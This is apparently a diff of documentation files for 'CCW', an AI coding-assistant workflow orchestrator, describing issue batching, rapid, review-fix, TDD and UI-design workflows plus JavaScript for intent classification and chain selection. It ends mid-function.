**Ideal scenarios**:
- Multiple related bugs needing batch fixes
- Batch processing of GitHub Issues
- Tech debt cleanup
- Batch security vulnerability fixes
- Code quality improvement campaigns
**Avoid when**:
- A single issue → `/workflow:lite-fix`
- Independent unrelated tasks → handle separately
- Urgent production issues → `/workflow:lite-fix --hotfix`
## Issue Lifecycle
```
draft → planned → queued → executing → completed
↓ ↓
skipped on-hold
```
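One plausible reading of the lifecycle diagram as a transition table (illustrative; the real state machine may permit additional transitions):

```javascript
// Allowed transitions for the issue lifecycle above.
// Assumes planned can be skipped and executing can go on-hold.
const TRANSITIONS = {
  draft: ['planned'],
  planned: ['queued', 'skipped'],
  queued: ['executing'],
  executing: ['completed', 'on-hold'],
  'on-hold': ['executing'],
}

function canTransition(from, to) {
  return (TRANSITIONS[from] || []).includes(to)
}
```

Terminal states (`completed`, `skipped`) have no outgoing transitions.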
## Conflict Types
| Type | Description | Resolution |
|------|-------------|------------|
| File | Multiple solutions modify the same file | Sequential execution |
| API | API signature change impact | Dependency ordering |
| Data | Data structure change conflicts | User decision |
| Dependency | Package dependency conflicts | Version negotiation |
| Architecture | Conflicting architectural directions | User decision (high severity) |
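File conflict detection can be sketched as a pairwise overlap check (illustrative; assumes each solution declares a `files` array, which is a hypothetical shape):

```javascript
// Flag File-type conflicts: pairs of solutions whose file sets overlap.
// Overlapping pairs get the table's resolution: sequential execution.
function findFileConflicts(solutions) {
  const conflicts = []
  for (let i = 0; i < solutions.length; i++) {
    for (let j = i + 1; j < solutions.length; j++) {
      const shared = solutions[i].files.filter(f => solutions[j].files.includes(f))
      if (shared.length > 0) {
        conflicts.push({
          type: 'File',
          pair: [solutions[i].id, solutions[j].id],
          files: shared,
          resolution: 'sequential'
        })
      }
    }
  }
  return conflicts
}
```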
## Configuration
```javascript
const issueConfig = {
plan: {
solutionsPerIssue: 3, // Generate up to 3 solutions
autoSelect: false, // User must bind solution
planningAgent: 'issue-plan-agent'
},
queue: {
conflictAnalysis: true,
priorityCalculation: true,
clarifyThreshold: 'high', // Ask user for high-severity conflicts
queueAgent: 'issue-queue-agent'
},
execute: {
dagParallel: true,
executionLevel: 'solution', // Execute by solution, not task
executor: 'codex',
resumable: true
}
}
```
## Example Invocations
```bash
# From GitHub Issues
ccw "Batch-process all GitHub Issues with label:bug"
→ issue:new (import from GitHub)
→ issue:plan (generate solutions)
→ issue:queue (form execution queue)
→ issue:execute (batch execute)
# Tech debt cleanup
ccw "Handle all TODO comments and known technical debt"
→ issue:discover (find issues)
→ issue:plan (plan solutions)
→ issue:queue (prioritize)
→ issue:execute (execute)
# Security vulnerabilities
ccw "Fix all security vulnerabilities reported by npm audit"
→ issue:new (from audit report)
→ issue:plan (upgrade strategies)
→ issue:queue (conflict resolution)
→ issue:execute (staged upgrades)
```
## Queue Structure
```json
{
"queue_id": "QUE-20251227-143000",
"status": "active",
"execution_groups": [
{
"id": "P1",
"type": "parallel",
"solutions": ["SOL-ISS-001-1", "SOL-ISS-002-1"],
"description": "Independent fixes, no file overlap"
},
{
"id": "S1",
"type": "sequential",
"solutions": ["SOL-ISS-003-1"],
"depends_on": ["P1"],
"description": "Depends on P1 completion"
}
]
}
```
## Output Artifacts
```
.workflow/issues/
├── issues.jsonl # All issues (one per line)
├── solutions/
│ ├── ISS-001.jsonl # Solutions for ISS-001
│ └── ISS-002.jsonl
├── queues/
│ ├── index.json # Queue index
│ └── QUE-xxx.json # Queue details
└── execution/
└── {queue-id}/
├── progress.json
└── results/
```
## Progress Tracking
```javascript
// Real-time progress during execution
const progress = {
queue_id: "QUE-xxx",
total_solutions: 5,
completed: 2,
in_progress: 1,
pending: 2,
current_group: "P1",
eta: "15 minutes"
}
```
## Resume Capability
```bash
# If execution interrupted
ccw "Continue executing the issue queue"
→ Detects active queue: QUE-xxx
→ Resumes from last checkpoint
→ /issue:execute --resume
```
@@ -1,104 +0,0 @@
# Action: Rapid Workflow
Rapid iteration workflow: multi-model collaborative analysis + direct execution
## Pattern
```
lite-plan → lite-execute
```
## Trigger Conditions
- Complexity: Low to Medium
- Intent: Feature development
- Context: Clear requirements, known implementation path
- No uncertainty keywords
## Execution Flow
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant LP as lite-plan
participant LE as lite-execute
participant CLI as CLI Tools
U->>O: Task description
O->>O: Classify: rapid
O->>LP: /workflow:lite-plan "task"
LP->>LP: Complexity assessment
LP->>CLI: Parallel explorations (if needed)
CLI-->>LP: Exploration results
LP->>LP: Generate plan.json
LP->>U: Display plan, ask confirmation
U->>LP: Confirm + select execution method
LP->>LE: /workflow:lite-execute --in-memory
LE->>CLI: Execute tasks (Agent/Codex)
CLI-->>LE: Results
LE->>LE: Optional code review
LE-->>U: Execution complete
```
## When to Use
**Ideal scenarios**:
- Adding a single feature (e.g., user avatar upload)
- Modifying an existing feature (e.g., updating form validation)
- Small refactors (e.g., extracting a shared method)
- Adding test cases
- Documentation updates
**Avoid when**:
- Implementation approach is uncertain
- Changes span multiple modules
- Architectural decisions are needed
- Complex dependencies exist
## Configuration
```javascript
const rapidConfig = {
explorationThreshold: {
// Force exploration if task mentions specific files
forceExplore: /\b(file|文件|module|模块|class|类)\s*[:]?\s*\w+/i,
// Skip exploration for simple tasks
skipExplore: /\b(add|添加|create|创建)\s+(comment|注释|log|日志)/i
},
defaultExecution: 'Agent', // Agent for low complexity
codeReview: {
default: 'Skip', // Skip review for simple tasks
threshold: 'medium' // Enable for medium+ complexity
}
}
```
## Example Invocations
```bash
# Simple feature
ccw "Add a user logout button"
→ lite-plan → lite-execute (Agent)
# With exploration
ccw "Optimize the token refresh logic in AuthService"
→ lite-plan -e → lite-execute (Agent, Gemini review)
# Medium complexity
ccw "Implement local storage for user preference settings"
→ lite-plan -e → lite-execute (Codex)
```
## Output Artifacts
```
.workflow/.lite-plan/{task-slug}-{date}/
├── exploration-*.json # If exploration was triggered
├── explorations-manifest.json
└── plan.json # Implementation plan
```
@@ -1,84 +0,0 @@
# Review-Fix Workflow Action
## Pattern
```
review-session-cycle → review-fix
```
## Trigger Conditions
- Keywords: "review", "审查", "检查代码", "code review", "质量检查"
- Scenarios: PR review, code quality improvement, security audits
## Execution Flow
```mermaid
graph TD
A[User Input] --> B[review-session-cycle]
B --> C{7-dimension analysis}
C --> D[Security]
C --> E[Performance]
C --> F[Maintainability]
C --> G[Architecture]
C --> H[Code Style]
C --> I[Test Coverage]
C --> J[Documentation]
D & E & F & G & H & I & J --> K[Findings Aggregation]
K --> L{Quality Gate}
L -->|Pass| M[Report Only]
L -->|Fail| N[review-fix]
N --> O[Auto Fix]
O --> P[Re-verify]
```
## Configuration
| Parameter | Default | Description |
|------|--------|------|
| dimensions | all | Review dimensions (security, performance, etc.) |
| quality_gate | 80 | Quality gate score |
| auto_fix | true | Auto-fix discovered issues |
| severity_threshold | medium | Minimum severity to report |
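The `quality_gate` and `auto_fix` parameters could combine roughly as follows (a sketch under the assumption that each dimension yields a 0-100 score, not the actual gate logic):

```javascript
// Decide report-only vs auto-fix from per-dimension scores (0-100 each),
// mirroring the quality_gate / auto_fix parameters above.
function qualityGate(scores, { gate = 80, autoFix = true } = {}) {
  const overall = scores.reduce((a, b) => a + b, 0) / scores.length
  if (overall >= gate) return { pass: true, action: 'report-only', overall }
  return { pass: false, action: autoFix ? 'review-fix' : 'report-only', overall }
}
```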
## CLI Integration
| Phase | CLI Hint | Purpose |
|------|----------|------|
| review-session-cycle | `gemini --mode analysis` | Multi-dimension deep analysis |
| review-fix | `codex --mode write` | Auto-fix issues |
## Slash Commands
```bash
/workflow:review-session-cycle   # Session-level code review
/workflow:review-module-cycle    # Module-level code review
/workflow:review-fix             # Auto-fix review findings
/workflow:review --type security # Targeted security review
```
## Review Dimensions
| Dimension | Checkpoints |
|------|--------|
| Security | Injection, XSS, sensitive data exposure |
| Performance | N+1 queries, memory leaks, algorithmic complexity |
| Maintainability | Code duplication, complexity, naming |
| Architecture | Dependency direction, layering violations, coupling |
| Code Style | Formatting, conventions, consistency |
| Test Coverage | Coverage rate, edge cases |
| Documentation | Comments, API docs, README |
## When to Use
- Pre-merge PR review
- Quality verification after refactoring
- Security compliance audits
- Tech debt assessment
## Risk Assessment
| Risk | Mitigation |
|------|----------|
| Too many false positives | Filter via severity_threshold |
| Fixes introduce new issues | Re-verify loop |
| Incomplete review | 7-dimension coverage |
@@ -1,66 +0,0 @@
# TDD Workflow Action
## Pattern
```
tdd-plan → execute → tdd-verify
```
## Trigger Conditions
- Keywords: "tdd", "test-driven", "测试驱动", "先写测试", "red-green"
- Scenarios: high code-quality requirements, critical business logic, high regression risk
## Execution Flow
```mermaid
graph TD
A[User Input] --> B[tdd-plan]
B --> C{Generate test task chain}
C --> D[Red Phase: write failing tests]
D --> E[execute: implement code]
E --> F[Green Phase: tests pass]
F --> G{Refactor needed?}
G -->|Yes| H[Refactor Phase]
H --> F
G -->|No| I[tdd-verify]
I --> J[Quality report]
```
## Configuration
| Parameter | Default | Description |
|------|--------|------|
| coverage_target | 80% | Target coverage |
| cycle_limit | 10 | Max Red-Green-Refactor cycles |
| strict_mode | false | Strict mode (red before green required) |
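The `cycle_limit` and `coverage_target` parameters suggest a loop like this (a sketch; `runCycle` is a hypothetical stand-in for one Red-Green-Refactor pass returning `{ green, coverage }`):

```javascript
// Repeat Red-Green-Refactor until tests are green and coverage meets
// the target, giving up after cycleLimit passes.
function tddLoop(runCycle, { cycleLimit = 10, coverageTarget = 0.8 } = {}) {
  for (let cycle = 1; cycle <= cycleLimit; cycle++) {
    const result = runCycle(cycle)
    if (result.green && result.coverage >= coverageTarget) {
      return { done: true, cycles: cycle, coverage: result.coverage }
    }
  }
  return { done: false, cycles: cycleLimit }
}
```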
## CLI Integration
| Phase | CLI Hint | Purpose |
|------|----------|------|
| tdd-plan | `gemini --mode analysis` | Analyze test strategy |
| execute | `codex --mode write` | Implement code |
| tdd-verify | `gemini --mode analysis` | Verify TDD compliance |
## Slash Commands
```bash
/workflow:tdd-plan    # Generate TDD task chain
/workflow:execute     # Run Red-Green-Refactor
/workflow:tdd-verify  # Verify TDD compliance + coverage
```
## When to Use
- Core business logic development
- Modules requiring high test coverage
- Refactoring existing code without breaking behavior
- Team-mandated TDD practice
## Risk Assessment
| Risk | Mitigation |
|------|----------|
| Poor test granularity | Assess test boundaries during tdd-plan |
| Over-testing | Focus on behavior, not implementation |
| Too many cycles | Capped by cycle_limit |
@@ -1,79 +0,0 @@
# UI Design Workflow Action
## Pattern
```
ui-design:[explore|imitate]-auto → design-sync → plan → execute
```
## Trigger Conditions
- Keywords: "ui", "界面", "design", "组件", "样式", "布局", "前端"
- Variant triggers:
- `imitate`: "参考", "模仿", "像", "类似"
- `explore`: default when no specific reference is given
## Variants
### Explore (exploratory design)
```mermaid
graph TD
A[User Input] --> B[ui-design:explore-auto]
B --> C[Design system analysis]
C --> D[Component structure planning]
D --> E[design-sync]
E --> F[plan]
F --> G[execute]
```
### Imitate (reference-based design)
```mermaid
graph TD
A[User Input + Reference] --> B[ui-design:imitate-auto]
B --> C[Reference analysis]
C --> D[Style extraction]
D --> E[design-sync]
E --> F[plan]
F --> G[execute]
```
## Configuration
| Parameter | Default | Description |
|------|--------|------|
| design_system | auto | Design system (auto/tailwind/mui/custom) |
| responsive | true | Responsive design |
| accessibility | true | Accessibility support |
## CLI Integration
| Phase | CLI Hint | Purpose |
|------|----------|------|
| explore/imitate | `gemini --mode analysis` | Design analysis, style extraction |
| design-sync | - | Sync design decisions with the codebase |
| plan | - | Built-in planning |
| execute | `codex --mode write` | Component implementation |
## Slash Commands
```bash
/workflow:ui-design:explore-auto   # Exploratory UI design
/workflow:ui-design:imitate-auto   # Reference-based UI design
/workflow:ui-design:design-sync    # Sync design with code (key step)
/workflow:ui-design:style-extract  # Extract existing styles
/workflow:ui-design:codify-style   # Codify styles
```
## When to Use
- New page/component development
- UI refactoring or modernization
- Establishing a design system
- Borrowing design from other products
## Risk Assessment
| Risk | Mitigation |
|------|----------|
| Inconsistent design | style-extract ensures reuse |
| Responsive issues | Multi-breakpoint verification |
| Missing accessibility | Integrated a11y checks |
@@ -1,435 +0,0 @@
# CCW Orchestrator
Stateless orchestrator: analyze input → select workflow chain → execute with TODO tracking
## Architecture
```
┌──────────────────────────────────────────────────────────────────┐
│ CCW Orchestrator │
├──────────────────────────────────────────────────────────────────┤
│ │
│ Phase 1: Input Analysis │
│ ├─ Parse input (natural language / explicit command) │
│ ├─ Classify intent (bugfix / feature / issue / ui / docs) │
│ └─ Assess complexity (low / medium / high) │
│ │
│ Phase 2: Chain Selection │
│ ├─ Load index/workflow-chains.json │
│ ├─ Match intent → chain(s) │
│ ├─ Filter by complexity │
│ └─ Select optimal chain │
│ │
│ Phase 3: User Confirmation (optional) │
│ ├─ Display selected chain and steps │
│ └─ Allow modification or manual selection │
│ │
│ Phase 4: TODO Tracking Setup │
│ ├─ Create TodoWrite with chain steps │
│ └─ Mark first step as in_progress │
│ │
│ Phase 5: Execution Loop │
│ ├─ Execute current step (SlashCommand) │
│ ├─ Update TODO status (completed) │
│ ├─ Check auto_continue flag │
│ └─ Proceed to next step or wait for user │
│ │
└──────────────────────────────────────────────────────────────────┘
```
## Implementation
### Phase 1: Input Analysis
```javascript
// Load external configuration (externalized for flexibility)
const intentRules = JSON.parse(Read('.claude/skills/ccw/index/intent-rules.json'))
const capabilities = JSON.parse(Read('.claude/skills/ccw/index/command-capabilities.json'))
function analyzeInput(userInput) {
const input = userInput.trim()
// Check for explicit command passthrough
if (input.match(/^\/(?:workflow|issue|memory|task):/)) {
return { type: 'explicit', command: input, passthrough: true }
}
// Classify intent using external rules
const intent = classifyIntent(input, intentRules.intent_patterns)
// Assess complexity using external indicators
const complexity = assessComplexity(input, intentRules.complexity_indicators)
// Detect tool preferences using external triggers
const toolPreference = detectToolPreference(input, intentRules.cli_tool_triggers)
return {
type: 'natural',
text: input,
intent,
complexity,
toolPreference,
passthrough: false
}
}
function classifyIntent(text, patterns) {
// Sort by priority
const sorted = Object.entries(patterns)
.sort((a, b) => a[1].priority - b[1].priority)
for (const [intentType, config] of sorted) {
// Handle variants (bugfix, ui, docs)
if (config.variants) {
for (const [variant, variantConfig] of Object.entries(config.variants)) {
const variantPatterns = variantConfig.patterns || variantConfig.triggers || []
if (matchesAnyPattern(text, variantPatterns)) {
// For bugfix, check if standard patterns also match
if (intentType === 'bugfix') {
const standardMatch = matchesAnyPattern(text, config.variants.standard?.patterns || [])
if (standardMatch) {
return { type: intentType, variant, workflow: variantConfig.workflow }
}
} else {
return { type: intentType, variant, workflow: variantConfig.workflow }
}
}
}
// Check default variant
if (config.variants.standard) {
if (matchesAnyPattern(text, config.variants.standard.patterns)) {
return { type: intentType, variant: 'standard', workflow: config.variants.standard.workflow }
}
}
}
// Handle simple patterns (exploration, tdd, review)
if (config.patterns && !config.require_both) {
if (matchesAnyPattern(text, config.patterns)) {
return { type: intentType, workflow: config.workflow }
}
}
// Handle dual-pattern matching (issue_batch)
if (config.require_both && config.patterns) {
const matchBatch = matchesAnyPattern(text, config.patterns.batch_keywords)
const matchAction = matchesAnyPattern(text, config.patterns.action_keywords)
if (matchBatch && matchAction) {
return { type: intentType, workflow: config.workflow }
}
}
}
// Default to feature
return { type: 'feature' }
}
function matchesAnyPattern(text, patterns) {
if (!Array.isArray(patterns)) return false
const lowerText = text.toLowerCase()
return patterns.some(p => lowerText.includes(p.toLowerCase()))
}
function assessComplexity(text, indicators) {
let score = 0
for (const [level, config] of Object.entries(indicators)) {
if (config.patterns) {
for (const [category, patternConfig] of Object.entries(config.patterns)) {
if (matchesAnyPattern(text, patternConfig.keywords)) {
score += patternConfig.weight || 1
}
}
}
}
if (score >= indicators.high.score_threshold) return 'high'
if (score >= indicators.medium.score_threshold) return 'medium'
return 'low'
}
function detectToolPreference(text, triggers) {
for (const [tool, config] of Object.entries(triggers)) {
// Check explicit triggers
if (matchesAnyPattern(text, config.explicit)) return tool
// Check semantic triggers
if (matchesAnyPattern(text, config.semantic)) return tool
}
return null
}
```
### Phase 2: Chain Selection
```javascript
// Load workflow chains index
const chains = JSON.parse(Read('.claude/skills/ccw/index/workflow-chains.json'))
function selectChain(analysis) {
const { intent, complexity } = analysis
// Map intent type (from intent-rules.json) to chain ID (from workflow-chains.json)
const chainMapping = {
'bugfix': 'bugfix',
'issue_batch': 'issue', // intent-rules.json key → chains.json chain ID
'exploration': 'full',
'ui_design': 'ui', // intent-rules.json key → chains.json chain ID
'tdd': 'tdd',
'review': 'review-fix',
'documentation': 'docs', // intent-rules.json key → chains.json chain ID
'feature': null // Use complexity fallback
}
let chainId = chainMapping[intent.type]
// Fallback to complexity-based selection
if (!chainId) {
chainId = chains.chain_selection_rules.complexity_fallback[complexity]
}
const chain = chains.chains[chainId]
// Handle variants
let steps = chain.steps
if (chain.variants) {
const variant = intent.variant || Object.keys(chain.variants)[0]
steps = chain.variants[variant].steps
}
return {
id: chainId,
name: chain.name,
description: chain.description,
steps,
complexity: chain.complexity,
estimated_time: chain.estimated_time
}
}
```
### Phase 3: User Confirmation
```javascript
function confirmChain(selectedChain, analysis) {
// Skip confirmation for simple chains
if (selectedChain.steps.length <= 2 && analysis.complexity === 'low') {
return selectedChain
}
console.log(`
## CCW Workflow Selection
**Task**: ${analysis.text.substring(0, 80)}...
**Intent**: ${analysis.intent.type}${analysis.intent.variant ? ` (${analysis.intent.variant})` : ''}
**Complexity**: ${analysis.complexity}
**Selected Chain**: ${selectedChain.name}
**Description**: ${selectedChain.description}
**Estimated Time**: ${selectedChain.estimated_time}
**Steps**:
${selectedChain.steps.map((s, i) => `${i + 1}. ${s.command}${s.optional ? ' (optional)' : ''}`).join('\n')}
`)
const response = AskUserQuestion({
questions: [{
question: `Proceed with ${selectedChain.name}?`,
header: "Confirm",
multiSelect: false,
options: [
{ label: "Proceed", description: `Execute ${selectedChain.steps.length} steps` },
{ label: "Rapid", description: "Use lite-plan → lite-execute" },
{ label: "Full", description: "Use brainstorm → plan → execute" },
{ label: "Manual", description: "Specify commands manually" }
]
}]
})
// Handle alternative selection
if (response.Confirm === 'Rapid') {
return selectChain({ intent: { type: 'feature' }, complexity: 'low' })
}
if (response.Confirm === 'Full') {
return chains.chains['full']
}
if (response.Confirm === 'Manual') {
return null // User will specify
}
return selectedChain
}
```
### Phase 4: TODO Tracking Setup
```javascript
function setupTodoTracking(chain, analysis) {
const todos = chain.steps.map((step, index) => ({
content: `[${index + 1}/${chain.steps.length}] ${step.command}`,
status: index === 0 ? 'in_progress' : 'pending',
activeForm: `Executing ${step.command}`
}))
// Add header todo
todos.unshift({
content: `CCW: ${chain.name} (${chain.steps.length} steps)`,
status: 'in_progress',
activeForm: `Running ${chain.name} workflow`
})
TodoWrite({ todos })
return {
chain,
currentStep: 0,
todos
}
}
```
### Phase 5: Execution Loop
```javascript
async function executeChain(execution, analysis) {
const { chain, todos } = execution
let currentStep = 0
while (currentStep < chain.steps.length) {
const step = chain.steps[currentStep]
// Update TODO: mark current as in_progress
const updatedTodos = todos.map((t, i) => ({
...t,
status: i === 0
? 'in_progress'
: i === currentStep + 1
? 'in_progress'
: i <= currentStep
? 'completed'
: 'pending'
}))
TodoWrite({ todos: updatedTodos })
console.log(`\n### Step ${currentStep + 1}/${chain.steps.length}: ${step.command}\n`)
// Check for confirmation requirement
if (step.confirm_before) {
const proceed = AskUserQuestion({
questions: [{
question: `Ready to execute ${step.command}?`,
header: "Step",
multiSelect: false,
options: [
{ label: "Execute", description: "Run this step" },
{ label: "Skip", description: "Skip to next step" },
{ label: "Abort", description: "Stop workflow" }
]
}]
})
if (proceed.Step === 'Skip') {
currentStep++
continue
}
if (proceed.Step === 'Abort') {
break
}
}
// Execute the command
const args = analysis.text
SlashCommand(step.command, { args })
// Mark step as completed
updatedTodos[currentStep + 1].status = 'completed'
TodoWrite({ todos: updatedTodos })
currentStep++
// Check auto_continue
if (!step.auto_continue && currentStep < chain.steps.length) {
console.log(`
Step completed. Next: ${chain.steps[currentStep].command}
Type "continue" to proceed or specify different action.
`)
// Wait for user input before continuing
break
}
}
// Final status
if (currentStep >= chain.steps.length) {
const finalTodos = todos.map(t => ({ ...t, status: 'completed' }))
TodoWrite({ todos: finalTodos })
console.log(`\n${chain.name} workflow completed (${chain.steps.length} steps)`)
}
return { completed: currentStep, total: chain.steps.length }
}
```
## Main Orchestration Entry
```javascript
async function ccwOrchestrate(userInput) {
console.log('## CCW Orchestrator\n')
// Phase 1: Analyze input
const analysis = analyzeInput(userInput)
// Handle explicit command passthrough
if (analysis.passthrough) {
console.log(`Direct command: ${analysis.command}`)
return SlashCommand(analysis.command)
}
// Phase 2: Select chain
const selectedChain = selectChain(analysis)
// Phase 3: Confirm (for complex workflows)
const confirmedChain = confirmChain(selectedChain, analysis)
if (!confirmedChain) {
console.log('Manual mode selected. Specify commands directly.')
return
}
// Phase 4: Setup TODO tracking
const execution = setupTodoTracking(confirmedChain, analysis)
// Phase 5: Execute
const result = await executeChain(execution, analysis)
return result
}
```
## Decision Matrix
| Intent | Complexity | Chain | Steps |
|--------|------------|-------|-------|
| bugfix (standard) | * | bugfix | lite-fix |
| bugfix (hotfix) | * | bugfix | lite-fix --hotfix |
| issue | * | issue | plan → queue → execute |
| exploration | * | full | brainstorm → plan → execute |
| ui (explore) | * | ui | ui-design:explore → sync → plan → execute |
| ui (imitate) | * | ui | ui-design:imitate → sync → plan → execute |
| tdd | * | tdd | tdd-plan → execute → tdd-verify |
| review | * | review-fix | review-session-cycle → review-fix |
| docs | low | docs | update-related |
| docs | medium+ | docs | docs → execute |
| feature | low | rapid | lite-plan → lite-execute |
| feature | medium | coupled | plan → verify → execute |
| feature | high | full | brainstorm → plan → execute |
## Continuation Commands
After each step pause:
| User Input | Action |
|------------|--------|
| `continue` | Execute next step |
| `skip` | Skip current step |
| `abort` | Stop workflow |
| `/workflow:*` | Execute specific command |
| Natural language | Re-analyze and potentially switch chains |
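The routing table above can be sketched as a small dispatcher (hypothetical `routeContinuation`; per the table, natural-language input is fed back into input analysis):

```javascript
// Route a continuation reply after a step pause, per the table above.
function routeContinuation(input) {
  const text = input.trim()
  if (text === 'continue') return { action: 'next-step' }
  if (text === 'skip') return { action: 'skip-step' }
  if (text === 'abort') return { action: 'abort' }
  // Explicit slash command: execute it directly
  if (/^\/(workflow|issue|memory|task):/.test(text)) return { action: 'command', command: text }
  // Anything else: re-analyze and potentially switch chains
  return { action: 'reanalyze', text }
}
```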
@@ -1,336 +0,0 @@
# Intent Classification Specification
CCW intent classification spec: defines how task intent is recognized from user input and the optimal workflow is selected.
## Classification Hierarchy
```
Intent Classification
├── Priority 1: Explicit Commands
│ └── /workflow:*, /issue:*, /memory:*, /task:*
├── Priority 2: Bug Keywords
│ ├── Hotfix: urgent + bug keywords
│ └── Standard: bug keywords only
├── Priority 3: Issue Batch
│ └── Multiple + fix keywords
├── Priority 4: Exploration
│ └── Uncertainty keywords
├── Priority 5: UI/Design
│ └── Visual/component keywords
└── Priority 6: Complexity Fallback
├── High → Coupled
├── Medium → Rapid
└── Low → Rapid
```
## Keyword Patterns
### Bug Detection
```javascript
// Note: \b does not match at CJK character boundaries in JS regexes,
// so Chinese keywords are listed outside the \b-delimited English alternation.
const BUG_PATTERNS = {
core: /\b(fix|bug|error|issue|crash|broken|fail|wrong|incorrect)\b|修复|报错|错误|问题|异常|崩溃|失败/i,
urgency: /\b(hotfix|urgent|production|critical|emergency|asap|immediately)\b|紧急|生产|线上|马上|立即/i,
symptoms: /\b(not working|doesn't work|can't|cannot|won't|stopped)\b|无法|不能|不工作/i,
errors: /\b(\d{3}\s*error|exception|stack\s*trace|undefined|null\s*pointer|timeout)\b/i
}
function detectBug(text) {
const isBug = BUG_PATTERNS.core.test(text) || BUG_PATTERNS.symptoms.test(text)
const isUrgent = BUG_PATTERNS.urgency.test(text)
const hasError = BUG_PATTERNS.errors.test(text)
if (!isBug && !hasError) return null
return {
type: 'bugfix',
mode: isUrgent ? 'hotfix' : 'standard',
confidence: (isBug && hasError) ? 'high' : 'medium'
}
}
```
### Issue Batch Detection
```javascript
const ISSUE_PATTERNS = {
batch: /\b(issues?|batch|queue|multiple|several|all)\b|多个|批量|一系列|所有|这些/i,
action: /\b(fix|resolve|handle|process)\b|处理|解决|修复/i,
source: /\b(github|jira|linear|backlog|todo)\b|待办/i
}
function detectIssueBatch(text) {
const hasBatch = ISSUE_PATTERNS.batch.test(text)
const hasAction = ISSUE_PATTERNS.action.test(text)
const hasSource = ISSUE_PATTERNS.source.test(text)
if (hasBatch && hasAction) {
return {
type: 'issue',
confidence: hasSource ? 'high' : 'medium'
}
}
return null
}
```
### Exploration Detection
```javascript
const EXPLORATION_PATTERNS = {
uncertainty: /\b(not sure|unsure|how to|what if|should i|could i)\b|不确定|不知道|怎么|如何|是否应该/i,
exploration: /\b(explore|research|investigate)\b|分析|研究|调研|评估|探索|了解/i,
options: /\b(options|alternatives|approaches)\b|方案|选择|方向|可能性/i,
questions: /(\b(what|which|how|why)\b|什么|哪个|怎样|为什么).*\?/i
}
function detectExploration(text) {
const hasUncertainty = EXPLORATION_PATTERNS.uncertainty.test(text)
const hasExploration = EXPLORATION_PATTERNS.exploration.test(text)
const hasOptions = EXPLORATION_PATTERNS.options.test(text)
const hasQuestion = EXPLORATION_PATTERNS.questions.test(text)
const score = [hasUncertainty, hasExploration, hasOptions, hasQuestion].filter(Boolean).length
if (score >= 2 || hasUncertainty) {
return {
type: 'exploration',
confidence: score >= 3 ? 'high' : 'medium'
}
}
return null
}
```
### UI/Design Detection
```javascript
const UI_PATTERNS = {
components: /\b(ui|component|button|form|modal|dialog)\b|界面|组件|按钮|表单|弹窗|对话框/i,
design: /\b(design|style|layout|theme|color)\b|设计|样式|布局|主题|颜色/i,
visual: /\b(visual|animation|responsive|mobile)\b|视觉|动画|响应式|移动端/i,
frontend: /\b(frontend|react|vue|angular|css|html|page)\b|前端|页面/i
}
function detectUI(text) {
const hasComponents = UI_PATTERNS.components.test(text)
const hasDesign = UI_PATTERNS.design.test(text)
const hasVisual = UI_PATTERNS.visual.test(text)
const hasFrontend = UI_PATTERNS.frontend.test(text)
const score = [hasComponents, hasDesign, hasVisual, hasFrontend].filter(Boolean).length
if (score >= 2) {
return {
type: 'ui',
hasReference: /参考|reference|based on|像|like|模仿|imitate/.test(text),
confidence: score >= 3 ? 'high' : 'medium'
}
}
return null
}
```
## Complexity Assessment
### Indicators
```javascript
const COMPLEXITY_INDICATORS = {
high: {
patterns: [
/\b(refactor|restructure)\b|重构|重新组织/i,
/\b(migrate|upgrade|convert)\b|迁移|升级|转换/i,
/\b(architect|system|infrastructure)\b|架构|系统|基础设施/i,
/\b(entire|complete|all\s+modules?)\b|整个|完整|所有模块/i,
/\b(security|scale|performance\s+critical)\b|安全|扩展|性能关键/i,
/\b(distributed|microservice|cluster)\b|分布式|微服务|集群/i
],
weight: 2
},
medium: {
patterns: [
/\b(integrate|connect|link)\b|集成|连接|链接/i,
/\b(api|database|service|endpoint)\b|数据库|服务|接口/i,
/\b(test|validate|coverage)\b|测试|验证|覆盖/i,
/\b(multiple\s+files?|several\s+components?)\b|多个文件|几个组件/i,
/\b(authentication|authorization)\b|认证|授权/i
],
weight: 1
},
low: {
patterns: [
/\b(add|create|simple)\b|添加|创建|简单/i,
/\b(update|modify|change)\b|更新|修改|改变/i,
/\b(single|one|small)\b|单个|一个|小/i,
/\b(comment|log|print)\b|注释|日志|打印/i
],
weight: -1
}
}
function assessComplexity(text) {
let score = 0
for (const [level, config] of Object.entries(COMPLEXITY_INDICATORS)) {
for (const pattern of config.patterns) {
if (pattern.test(text)) {
score += config.weight
}
}
}
// File count indicator
const fileMatches = text.match(/\b\d+\s*(files?|文件)/i)
if (fileMatches) {
const count = parseInt(fileMatches[0])
if (count > 10) score += 2
else if (count > 5) score += 1
}
// Module count indicator
const moduleMatches = text.match(/\b\d+\s*(modules?|模块)/i)
if (moduleMatches) {
const count = parseInt(moduleMatches[0])
if (count > 3) score += 2
else if (count > 1) score += 1
}
if (score >= 4) return 'high'
if (score >= 2) return 'medium'
return 'low'
}
```
## Workflow Selection Matrix
| Intent | Complexity | Workflow | Commands |
|--------|------------|----------|----------|
| bugfix (hotfix) | * | bugfix | `lite-fix --hotfix` |
| bugfix (standard) | * | bugfix | `lite-fix` |
| issue | * | issue | `issue:plan → queue → execute` |
| exploration | * | full | `brainstorm → plan → execute` |
| ui (reference) | * | ui | `ui-design:imitate-auto → plan` |
| ui (explore) | * | ui | `ui-design:explore-auto → plan` |
| feature | high | coupled | `plan → verify → execute` |
| feature | medium | rapid | `lite-plan → lite-execute` |
| feature | low | rapid | `lite-plan → lite-execute` |
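The matrix can equally be expressed as a lookup table. This is a sketch; the key derivation from intent fields (`mode`, `complexity`) is an assumption layered on the classifier output, not part of the spec.

```javascript
// The workflow selection matrix as data (illustrative sketch).
const WORKFLOW_MATRIX = {
  'bugfix:hotfix':   { workflow: 'bugfix',  commands: ['lite-fix --hotfix'] },
  'bugfix:standard': { workflow: 'bugfix',  commands: ['lite-fix'] },
  'issue':           { workflow: 'issue',   commands: ['issue:plan', 'queue', 'execute'] },
  'exploration':     { workflow: 'full',    commands: ['brainstorm', 'plan', 'execute'] },
  'ui:reference':    { workflow: 'ui',      commands: ['ui-design:imitate-auto', 'plan'] },
  'ui:explore':      { workflow: 'ui',      commands: ['ui-design:explore-auto', 'plan'] },
  'feature:high':    { workflow: 'coupled', commands: ['plan', 'verify', 'execute'] },
  'feature:medium':  { workflow: 'rapid',   commands: ['lite-plan', 'lite-execute'] },
  'feature:low':     { workflow: 'rapid',   commands: ['lite-plan', 'lite-execute'] }
};

function selectWorkflow(intent) {
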